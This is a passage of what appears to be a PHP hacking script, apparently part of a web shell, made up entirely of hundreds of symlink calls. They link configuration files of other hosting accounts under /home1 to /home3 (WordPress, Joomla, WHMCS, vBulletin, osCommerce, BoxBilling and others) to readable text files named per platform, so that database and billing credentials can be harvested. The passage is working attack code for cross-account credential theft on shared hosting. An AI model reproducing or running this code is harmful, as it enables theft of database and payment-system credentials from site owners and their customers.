  1594. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1595. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1596. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1597. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1598. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1599. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1600. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1601. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1602. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1603. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1604. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1605. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1606. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1607.  
  1608. //Home2
  1609.  
  1610. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1611. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1612. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1613. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1614. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1615. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1616. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1617. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1618. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1619. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1620. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1621. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1622. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1623. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1624. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1625. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1626. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1627. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1628. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1629. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1630. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1631. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1632. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1633. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1634. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1635. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1636. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1637. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1638. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1639. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1640. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1641. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1642. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1643. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1644. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1645. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1646. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1647. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1648. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1649. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1650. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1651. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1652. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1653. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1654. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1655. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1656. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1657. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1658. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1659. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1660. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1661. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1662. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1663. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1664. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1665. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1666. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1667. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1668. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1669. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1670. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1671. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1672. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1673. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1674. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1675. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1676. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1677. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1678. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1679. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1680. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1681. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1682. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1683. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1684. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1685. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1686. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1687. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1688. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1689. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1690. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1691. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1692. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1693. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1694. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1695. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1696. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1697. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1698. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1699. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1700. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1701. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1702. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1703. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1704. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1705. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1706. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1707. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1708. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1709. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1710. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1711. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1712. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1713. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1714. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1715. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1716. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1717. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1718. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1719. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1720. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1721. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1722. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1723. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1724. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1725. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1726. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1727. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1728. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1729. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1730. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1731. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1732. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1733. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1734. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1735. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1736. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1737. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1738. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1739. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1740. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1741. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1742. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1743. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1744. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1745. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1746. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1747. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1748. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1749. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1750. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1751. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1752. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1753. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1754. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1755. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1756. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1757. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1758. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1759. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1760. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1761. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1762. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1763. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1764. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1765. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1766. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1767. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1768. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1769. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1770. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1771. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1772. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1773. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1774. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1775. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1776. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1777. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1778. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1779. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1780. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1781. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1782. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1783. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1784. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1785. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1786. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1787. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1788. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1789. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1790.  
  1791. //Home3
  1792.  
  1793. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1794. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1795. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1796. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1797. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1798. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1799. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1800. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1801. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1802. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1803. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1804. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1805. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1806. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1807. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1808. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1809. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1810. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1811. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1812. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1813. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1814. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1815. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1816. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1817. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1818. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1819. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1820. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1821. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1822. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1823. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1824. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1825. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1826. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1827. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1828. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1829. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1830. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1831. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1832. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1833. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1834. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1835. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1836. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1837. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1838. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1839. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1840. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1841. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1842. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1843. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1844. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1845. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1846. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1847. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1848. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1849. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1850. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1851. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1852. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1853. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1854. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1855. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1856. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1857. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1858. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1859. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1860. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1861. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1862. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1863. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1864. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1865. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1866. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1867. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1868. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1869. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1870. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1871. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1872. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1873. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1874. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1875. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1876. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1877. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1878. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1879. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1880. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1881. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1882. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1883. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1884. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1885. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1886. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1887. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1888. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1889. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1890. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1891. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1892. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1893. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1894. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1895. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1896. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1897. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1898. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1899. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1900. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1901. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
